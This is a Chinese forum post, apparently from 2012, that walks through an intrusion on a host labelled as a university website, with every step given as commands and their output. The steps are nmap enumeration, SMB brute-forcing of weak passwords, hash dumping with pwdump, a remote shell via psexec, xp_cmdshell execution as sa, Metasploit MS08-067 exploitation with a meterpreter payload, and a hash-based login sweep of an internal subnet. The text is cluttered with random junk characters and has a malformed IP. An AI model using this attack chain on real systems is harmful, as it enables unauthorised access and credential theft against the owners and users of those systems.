广西师范网站http://202.103.242.241/
* ]+ f$ x+ M& n3 z
' H8 A/ Y9 A' V4 Z+ T/ z t* @root@bt:~# nmap -sS -sV 202.103.242.241: g# L) l" Q9 O; U; C' o; A
* E) ^/ j1 {4 J6 G4 f' I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST- Y2 V5 O4 ^8 g6 ^3 {. ^0 `
0 ]# {, o' p( M& F7 s+ o
Nmap scan report for bogon (202.103.242.241)4 Z2 n' x! n) G1 _6 V
6 t7 v3 ?5 Z# J# j7 b. v
Host is up (0.00048s latency).0 \6 n6 a# E5 i1 t2 |# o
4 R, s8 d4 l, ]- b8 B- g! u8 _
Not shown: 993 closed ports
9 p9 B1 W0 M$ }, [& s( A5 o; _0 a: g6 n& @
PORT STATE SERVICE VERSION5 S9 X( w) o4 K! l! t: m
9 }( N+ A$ O% W& V& |8 }$ [- x135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
" |8 l/ l3 I3 d$ H* d, n8 X1 l: l7 R# Y8 R& W
139/tcp open netbios-ssn: A, T8 ^) L d' U+ {1 K9 p8 k: E
6 m2 P1 o/ W$ \# p$ M v
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
$ B& q6 N* M9 G3 {! B
$ M/ D7 S- M5 k. _. G1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)+ y# M* C5 _. L: c1 c0 J
( U& s& Y9 ]3 ?) i, u% Q
1026/tcp open msrpc Microsoft Windows RPC
' w* i, \; F: {, F3 J& @7 v
7 U9 o# C2 X* @& f( B- |3372/tcp open msdtc?
& w' L, U2 ^: F( ?0 t. z+ o
( d+ x1 ^) E6 l5 u/ q! B3389/tcp open ms-term-serv?
e7 Y" Y% C- e# D3 y$ d) w% K0 q& B8 t# ?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
' E0 t: g1 \7 U! `2 ISF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
z) ~/ y: b* u! L3 _7 z- y D/ P- r: K5 R3 @9 J
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
- W* w: A( X" f' _. o5 V( k1 t1 ?7 G1 z/ W
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)- o5 j9 }. B x; M, `$ @0 p1 Y
. S3 g3 G! w s+ l' f( O4 B7 E" J
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO" M- D! f2 h: R
C& p( r: s8 i8 K7 U9 M- V- x1 u2 d, Q. ]
SF:ptions,6,”hO\n\x000Z”);
9 c8 n9 y. A) ?8 _! s
8 M+ y! B T4 @$ u* v9 P+ {MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 Y* x, P- }! I i! T% q! J2 ~
; H- x' P6 u' m+ R
Service Info: OS: Windows' e h( o+ A) Y& D& t
; h5 J% @$ b: D; q
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .) p4 C7 @# @: `) v0 A$ F0 o1 O) C
: ]- \+ _+ }1 c4 J& u6 o" RNmap done: 1 IP address (1 host up) scanned in 79.12 seconds$ u! w) g/ S+ _1 z# {
5 a$ ?5 C4 X9 f
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本+ g. t; a0 X$ f4 U& s' f" F6 D7 t. B
( }: f( e1 V: e. c% D-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse4 J: z4 R" c0 d1 ^* C2 H
0 b: e+ Z* N5 i1 M6 y" D
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
1 H9 Y" U6 S+ S7 O/ `9 j* p4 ^
$ g9 g g3 {( u( _-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
3 D% f0 \/ ], b7 H$ \0 Y6 O/ Z. O8 d# h) }9 l
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
2 m L7 l( r3 q9 ^# Y. Y$ R" M) t% p* M- \
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
! ^/ @. Z2 u+ E8 M6 d. H( y* O0 T1 X6 Q) }7 l/ \4 z G; @
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
6 S! J+ X/ _& J- Y5 a1 o9 E" L% K
) n& z* {; z2 N2 N-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
/ j9 ?2 s4 ?9 {6 v( u* q2 M6 e3 F1 W% P; n6 b
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
& b) J& S* `; i; \2 a! S0 n6 w2 n( `5 K$ G; F% v0 A- W" H. F+ d
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
) g/ x6 k9 G' e3 v* a* i$ z
7 M4 T& K t, a4 i! o0 C-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse4 K6 N/ d S7 o x& f0 W
; u$ I5 s9 z2 Y% O' }-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
1 v3 a d# e& |0 O1 H. o
9 t$ e2 _ P: I, ^# \-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse+ Y0 N* \, f' X# z! I2 P
+ h C( h" f2 z; S& p3 `6 S: \
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
- w, f! i' S) \ f
2 k! k3 t; x& e/ H, ]% c8 L( w& I-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
& @1 V- B1 v E, K6 E
( i" P, [9 X: `% }! b0 O& l0 f( f-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
2 M1 [" Z5 {+ i, Y5 O0 \) {. p
2 I: ?0 j' y5 A6 aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 % ?& M4 X0 Y( _% K
; n4 I) ]) H% A" W
//此乃使用脚本扫描远程机器所存在的账户名/ u* l5 R/ q+ P
* w8 F2 A% l v: c9 _3 _% i$ cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST# I+ @& d, G6 G G
( f* q6 Q5 m4 Q) E. J0 VNmap scan report for bogon (202.103.242.241)
* v2 h% f' E9 p) [( K% ?6 M, H" u8 D
Host is up (0.00038s latency).
+ i' m; R! f1 Y- E# `
. M8 a0 K9 l2 N6 H" b9 Q$ e: iNot shown: 993 closed ports
6 \9 P* s \: ~4 r3 o9 G
. T3 {7 F$ N0 Z M: O. M1 K9 CPORT STATE SERVICE
O( \7 ~) t# K7 G# \ U) ?: u @7 O3 @* a4 y0 Z2 @; u% F
135/tcp open msrpc
' x6 k. Q8 h- G: a, b |2 R; y3 Z1 l- l( Q) c, G2 h
139/tcp open netbios-ssn
8 E8 B/ _; }6 H" s, X
4 Q+ G. f, b9 m* x4 \445/tcp open microsoft-ds# j% n. M8 G1 p, c7 L2 P. B
% a& k1 m8 u1 | r
1025/tcp open NFS-or-IIS) P" n- V6 |, \0 E# _
1 \/ x, Z9 G6 a: X7 {1026/tcp open LSA-or-nterm
. l/ T! u b% j; `9 A
" q+ W. X/ J5 C. g) Y3 H$ f3372/tcp open msdtc
, D$ m. F% M6 F5 }9 T
1 L& w4 d6 U$ o m7 @0 j) c7 s3389/tcp open ms-term-serv
8 F# }; |+ p3 k) R6 T, p; T
7 t* m" J7 | l( YMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 T" Q! g4 `2 l$ Y& I8 X) Z6 R. |
Host script results:
) \5 o9 B' q; \
' c; w/ Y6 x- i' q; G| smb-enum-users:1 o F9 a. d4 A+ S+ x. z4 W3 h F, G
) l& Z2 r' @# h2 H! \5 N1 K|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果, H* V7 w3 Z# l# H: j+ Y8 T5 z
0 J& _; l; c3 X3 P+ }& L O% _
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
' a5 O% K( {% D2 j- I
* ~" S0 k! ~/ l8 P2 Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ( [" }" u: Y- V3 A! _5 C& R& M3 g0 t
- E+ R6 @. k& A//查看共享
1 A; P4 |5 O8 @/ @' h+ a4 S% p0 j7 D' c- V
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
0 k& F& m3 E# R
( g+ f3 O) N4 B' W! s$ Y4 _+ _$ I; cNmap scan report for bogon (202.103.242.241)5 A" \4 A& u4 u; c! o) q
3 P4 \9 ]/ u6 h* X( J. sHost is up (0.00035s latency).* C4 U1 |/ @) ^) k0 F+ u
5 \. Q' _0 q# L+ w& t& i
Not shown: 993 closed ports$ R4 ~ R9 z- J
& {" B; [" g; Q! |8 v7 {PORT STATE SERVICE, H( O8 q" p0 u6 I/ J2 Z7 M
+ n+ J- w' }( j: ~9 b5 \135/tcp open msrpc5 P/ w9 ?3 ^+ j# C& V9 W) G! [ D) n
3 u- A) G; o8 V5 W: K139/tcp open netbios-ssn! L$ G- ]9 q1 `# c1 |' H# W
6 G3 I$ h# V3 T/ v" O; V445/tcp open microsoft-ds
5 ]; \ R3 j+ \5 n4 a7 F1 ?
9 g9 D1 B( b# Q C B1025/tcp open NFS-or-IIS. h: ^( W# j, o* q9 n T3 ~
8 |' p* i+ |1 k
1026/tcp open LSA-or-nterm7 \) _- e4 T% u) q
! |7 [9 b @" `) F4 r3372/tcp open msdtc2 f2 Z. X/ W% @1 O: M, @/ |. b1 G
) Q# ?8 }2 w( V5 i, o- f3389/tcp open ms-term-serv
6 }2 V9 C8 U2 w8 i( C' J0 A, @$ n4 p& s; R: \' r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# \; P* F0 |+ o- i5 W. Q
5 D x( r) P" Q F# uHost script results:
" _. J: U, e; f& t( T8 b) Z3 P2 i9 I
| smb-enum-shares:
2 h1 ^; d. E$ o- G
, ], U0 m- G+ l* ], a+ _( s! p| ADMIN$
* u4 F' M9 R5 u" ^' A' I( @% g
! `) Q' J* x% b9 F5 \| Anonymous access: <none>) t- o* z7 C* p- R' I1 J
7 x: o3 t, S- q& g' I| C$
6 L) ~) u# W) r/ A6 [, d) i% C" p5 m' ?+ A- [
| Anonymous access: <none>
; Y7 a# K1 {- B) I% v' M$ a& J# p- X ~( D2 q. Y# r
| IPC$" Y$ ^# e; w0 V
( H: v* x2 r7 z) n# Y
|_ Anonymous access: READ* a8 G0 |4 u: t5 `% F* J
! D t1 x g* Q
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
; R4 j$ F. Z4 N. I* q
; S: T5 t4 Z0 V: _4 froot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
- _; s& E& F3 F) }2 m; v
7 n+ Q- N( n& [8 J. F5 t//获取用户密码
+ R. \6 H- k$ b0 X0 X6 v* O) z5 F5 O+ x) u# |( V" y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
' }' B; n& Y; }3 i, m# O9 W1 _6 w
Nmap scan report for bogon (202.103.242.2418)
U8 w& F' h* r6 u! m$ Z j- v( H Z# M* B% u, h
Host is up (0.00041s latency).
6 N' V9 [% S0 U+ K8 ~$ F4 y: N9 e
; c. `# b* N9 z- SNot shown: 993 closed ports6 L) {1 U9 ^9 ^7 {
: |5 Q' s4 p5 X5 K: n+ |PORT STATE SERVICE& s3 e) k) i" S( _1 o) }
/ P; G& g* q+ B. @135/tcp open msrpc
/ X5 ^1 a8 G& z
" ]: l9 P9 }: i; E) ?) J) P2 x139/tcp open netbios-ssn
- K) T; w l3 R4 Z w
/ v+ J, n! [9 R! U# T% B445/tcp open microsoft-ds3 z! `8 t" }$ j7 U; t
6 [1 o% X+ Y0 D3 b" \1025/tcp open NFS-or-IIS
( D$ x U, i7 X/ T5 o7 \, E
$ y9 Q8 Z* o: j3 ]% t+ l1026/tcp open LSA-or-nterm
/ E9 D5 m# C4 y
# f: H/ n4 x2 Q) z3372/tcp open msdtc/ t( a1 v/ T* @' H2 s0 i1 h# ?
5 b4 b0 r; J A3389/tcp open ms-term-serv
& n: r! [4 c" a8 S+ h& K; R7 L( F3 M& l9 x7 h- U q
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); k/ j& s8 A' ~: R- V
+ e5 p* ^& I% u# O3 n# UHost script results:
& M# F6 \- m/ I. F3 Q& }' Q, M+ x8 v% t" y% ?. P* d: F
| smb-brute:
9 a* x9 B5 J+ j4 ?
; w, X; B$ z( n/ t4 t6 Wadministrator:<blank> => Login was successful
l' P+ \/ q' j' E$ \. l \+ _- ~, Y0 J6 } f% [
|_ test:123456 => Login was successful0 M1 p) Z7 G v
. W6 L# T* z: R5 O( W. kNmap done: 1 IP address (1 host up) scanned in 28.22 seconds6 n/ d( B" A4 ?# m8 d& W1 v2 r
8 @3 Y5 E1 Y r3 S6 u3 q
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
( b; K! ?( X. m4 y1 @+ M% l
+ [3 @: t6 W" `4 U& w1 d7 Jroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
. o2 L$ `$ h- a3 U8 O1 h \- b4 Q) S, L1 D; I
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
) L. k# C$ W" A& v* i/ l6 h2 L- a' @$ U/ _% m
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
: h5 ?4 t; v9 b x* Y. J7 x% x! m1 O' I4 ~0 O6 S! c& X& f4 D7 W) ~
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
, ?9 c/ i$ }4 V' `* Q* q* \
# H& w0 K- v- H. [* TNmap scan report for bogon (202.103.242.241)0 `$ G8 l* B. Y3 K3 h r% ]
) Q' i- y, `% s2 o( iHost is up (0.0012s latency).
8 }) Z1 Z* ~( V9 B6 F
; c0 w, U3 W: Z2 S- F) W8 _PORT STATE SERVICE
) ]: B# G2 L6 P3 D% E5 |! {9 i& T; s) t4 }
135/tcp open msrpc% p1 i" s3 B" l( [, T2 k
' A% y& E5 K0 ^7 `9 O- Q6 M139/tcp open netbios-ssn
9 k. g/ l/ f' A& N8 [- ?9 V
* ]4 _# F% P5 g445/tcp open microsoft-ds
# |2 C% H: v& V0 |: V& l4 A* P) ]! B) _' r) Q: e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 V4 c: f y9 ^1 o6 o, y
( k" ~4 u; S4 W! P& l) i$ g" UHost script results:: I3 {9 r* d' C2 v! U: R" A
7 H5 l A* p' v! i| smb-pwdump:
: k6 A" V% S7 a; i2 h- L; z+ S8 p+ a$ h
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
9 Y- j2 p& u' P2 d& W" ^
* z; f5 e0 g: k| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************$ D5 e2 J) X! y3 X3 H
2 H! H' y4 E3 u3 s! E; N: T| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4% h6 l1 a* b0 v/ ~( S; i
# V; _. ?7 ?9 Z1 e|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D27 D' f6 K6 ^( y6 V; ~2 g) h' N
0 d& p- R0 ~, j7 b6 ] \+ h/ c* y2 NNmap done: 1 IP address (1 host up) scanned in 1.85 seconds, e' J4 E: c( {/ E, J6 _
( N, R% p a; c/ s/ \% y& U) x0 R9 T
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
3 X' o3 U1 j' k, u3 M |/ ~9 U# R/ D, {* _- `9 J+ H% J6 w
-p 123456 -e cmd.exe* x, r1 K! Z6 w) w
8 }& }! U! J; Q" d+ bPsExec v1.55 – Execute processes remotely
9 W! i* }2 s% Z" u) _) M) N1 Z! q4 B, b# v, b7 u# L
Copyright (C) 2001-2004 Mark Russinovich
; K8 a4 n# }0 f* z" ?1 h
: g) ?0 c" n8 J G1 p8 b( A: WSysinternals – www.sysinternals.com* o+ t# u2 T8 S7 z2 w
) f6 y3 W4 n0 P
Microsoft Windows 2000 [Version 5.00.2195]
: C- a5 E: u: X) ]! x8 v9 \9 M' Y! r$ Y0 V3 L
(C) 版权所有 1985-2000 Microsoft Corp.
" L, O% o* m8 ?! H7 u- F3 L" ? h5 ]& r& P
C:\WINNT\system32>ipconfig: \6 K: w$ S9 t; E
# W0 M# r* |/ }8 g! F: ?! `( R2 k. [Windows 2000 IP Configuration! V6 e( R& T6 f
: {. e* F7 F$ H) z2 s1 mEthernet adapter 本地连接:
' b @- `" Z6 S' o$ X" J( \
. N2 x- [/ h3 c S S; [/ y! \ YConnection-specific DNS Suffix . :. M# J- ^$ u' Z- x3 s
. ^# ?* }# c& x- Y! b& j, {IP Address. . . . . . . . . . . . : 202.103.242.241
% [- g# H0 Q0 V* X3 M& A* \; ]7 t3 w g! F
Subnet Mask . . . . . . . . . . . : 255.255.255.0
/ |- H- n8 _" |9 | H* D8 X' s/ S6 }6 R: G
Default Gateway . . . . . . . . . : 202.103.1.15 ]! b, n% k1 d3 p* q
' Q6 z2 T$ r0 o6 l% ]
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
H( g2 t" z$ l @
. E/ }2 R: [$ [; _% c9 Jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
3 o* R1 z0 x% l, x$ S5 B
; j' b! m( p+ S; I' a* iStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
$ @7 O5 }7 e7 ^/ \, U" `9 n* T" q Y% g* o
Nmap scan report for bogon (202.103.242.241)! h& i' k" S5 K1 ?. B. Z
7 f- b8 g# V. u: B( z+ d
Host is up (0.00046s latency).7 U( S7 g L: d4 w9 Y9 J8 l$ r
4 y! d) G/ d! y# c. j2 ?' ~& ?( INot shown: 993 closed ports
. d* D @8 {! @* c5 |8 N. u% t7 D& J2 [/ Y& J$ l
PORT STATE SERVICE
$ s* P9 `1 Z1 p% F$ U d c7 N+ N" x
135/tcp open msrpc- G9 l$ b/ j- h4 L
; g* ]+ s' T; L. L9 i
139/tcp open netbios-ssn
; M, X4 _5 D; p5 b! |$ ]1 j; F6 _* x! R' P2 a6 g6 Y
445/tcp open microsoft-ds
( U: l4 x7 s1 J# i# [; \, I- s+ ?- d$ h
1025/tcp open NFS-or-IIS+ l0 H. r- k* @5 Q5 M( M/ O9 V
- I. z$ J0 [- p: }9 t) l
1026/tcp open LSA-or-nterm
. e" b& G4 c% r) K' O/ a
( t0 z! Q, {6 X9 n3 j& T5 Q3372/tcp open msdtc- l* n2 {/ E6 }1 O8 [
2 R$ w+ }1 N' u5 X7 N, j
3389/tcp open ms-term-serv0 w" u) g9 a( W/ v# g4 f: n
$ b. L8 M: R% h+ w. `) ~ J
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, x9 j% h# l% \) M0 ^' G# g
1 t& w- R' i1 A9 S3 j% FHost script results: Y6 v: R) {! W6 ?6 K6 Q' Y
; G, i h8 Q# W
| smb-check-vulns:
: N" ~; S: T1 x- g, V7 E1 r
! s$ W& M, U" |0 w1 n3 s3 ] ]* D|_ MS08-067: VULNERABLE2 U q' [* g7 M& J' Y4 o
0 _- H) Z' j8 ^4 t# U$ k! h, L
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds4 `" D; w, D/ s5 T
. |6 q. q% b1 G7 ~, W. Wroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出) k* g* J6 d* W# b; |# i
/ p5 s" f& J5 n- t' ?7 v* E9 H& }msf > search ms08
2 u% S9 Z, [9 E& a' b5 N( q2 W1 ~# @0 U- w+ y0 W6 p3 m- [
msf > use exploit/windows/smb/ms08_067_netapi9 V! r) k+ A3 T" M" T' A8 }7 @! `
% r) V( v7 o: b- h8 Hmsf exploit(ms08_067_netapi) > show options6 R' V" D+ c0 T$ `' \
* O" T8 {) ]0 `* v+ ?msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
. Z4 |6 j' o R7 N2 A9 O* i1 {
' M. S( u. |/ M" B0 mmsf exploit(ms08_067_netapi) > show payloads
( t9 C4 V8 O9 f; N/ m& t0 f
- d' U$ {- c6 x: k9 Cmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
# P! A( D: k8 p! i9 }' o" N' d" V0 d. H. Z/ O% ?
msf exploit(ms08_067_netapi) > exploit, h! ?0 G) I) I" L6 f/ o
' O7 B, W3 G& f/ r. `8 r
meterpreter >
& N3 m% ?$ E& [$ h
9 U) |, \( A' p1 ]8 ?$ S$ n0 T' a0 }; U- h$ uBackground session 2? [y/N] (ctrl+z)/ c3 j1 V! u6 j' \6 \/ C& m, f
, Q8 O" Z/ U! o- H; Q _
msf exploit(ms08_067_netapi) > sessions -l/ `/ Y9 g( y0 d" }2 @2 ~- V& c) H
]) C0 d( ^4 ?* I- w$ Oroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt8 r/ R# R h" ]8 w3 e' v
* a- D1 w! D5 d5 \ l9 c8 ktest
) ^6 j6 A# o: t$ t0 B7 L7 C+ \9 c, S
administrator' E, e+ L1 u: k- q0 J% [6 {8 Y3 ]+ x
8 y2 V' L6 K! @
root@bt:/usr/local/share/nmap/scripts# vim password.txt
$ z J4 c- R. |. T2 |5 A) c
3 V2 o6 \3 l& M7 a6 B; `44EFCE164AB921CAAAD3B435B51404EE
0 A3 Y6 G# Q* E3 W, \' L, n8 i) M# I8 x1 ~/ f1 ~% Z0 `9 O6 E
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 - }; j# F _" s) i8 n
8 X% e6 T3 `* k$ `$ Z% [; _* L4 \
//利用用户名跟获取的hash尝试对整段内网进行登录
; y+ a2 ^( h2 s7 h7 }5 Y" i$ A: K- Q/ B; x) D& b$ j
Nmap scan report for 192.168.1.105
8 O# L' _3 Q" J; G; z- ^% Q# c5 P c) B+ ]: q" }
Host is up (0.00088s latency).
* X1 s4 N, v, v1 H
" J/ e9 \* f2 k: J1 mNot shown: 993 closed ports
0 z9 _6 K" ]) j; L( z, G
: R/ N0 U4 Z% UPORT STATE SERVICE
7 e2 ^+ J( @$ v7 L+ O2 ~" n4 h8 ]! `8 t( i- w0 g) D3 x s/ \
135/tcp open msrpc$ B! e2 J. b" X
3 s$ a% R2 Q+ {4 S8 k0 m# f139/tcp open netbios-ssn K+ x* f, P, R- g$ g6 m) L1 g
' L- E( a9 |6 Q
445/tcp open microsoft-ds
. F. z0 v, s% \1 N5 Y) Q: h4 @- X8 D
4 z2 Z/ R* ]2 K' A. A1025/tcp open NFS-or-IIS
; m( s% |, w, `9 W+ R
: g; a; ]' g$ }3 L: C' D1026/tcp open LSA-or-nterm) |. A' y5 j' ~0 C+ B( E- Y
! m D- g7 \0 t; M+ q. @$ K! F* D( s5 Q
3372/tcp open msdtc! ?5 r& k6 ]3 @! t9 e
% U& i' z) n7 L; d+ k2 F3389/tcp open ms-term-serv7 [6 h3 \. L. r; U( o: T N
* E2 U l4 a: R1 y9 Q! C; s0 A' \MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 G& V$ B& v1 _
) V9 N. V* Z7 E( J* DHost script results:6 u+ R: T# z# `: }: \' y
. T$ u! m) p( s| smb-brute:
/ k/ f9 w* t) k) j& r3 e1 }1 y s V1 e$ i" _% y* `6 u0 I# K/ R
|_ administrator:<blank> => Login was successful
4 A9 z5 n4 ]* D) e1 c& b) A; `0 S! \3 ]- T) k
攻击成功,一个简单的msf+nmap攻击~~·9 I: Z. w" D" z
- y+ a& r4 \) z
|
发表于 2012-12-4 12:46:42
收藏
支持
反对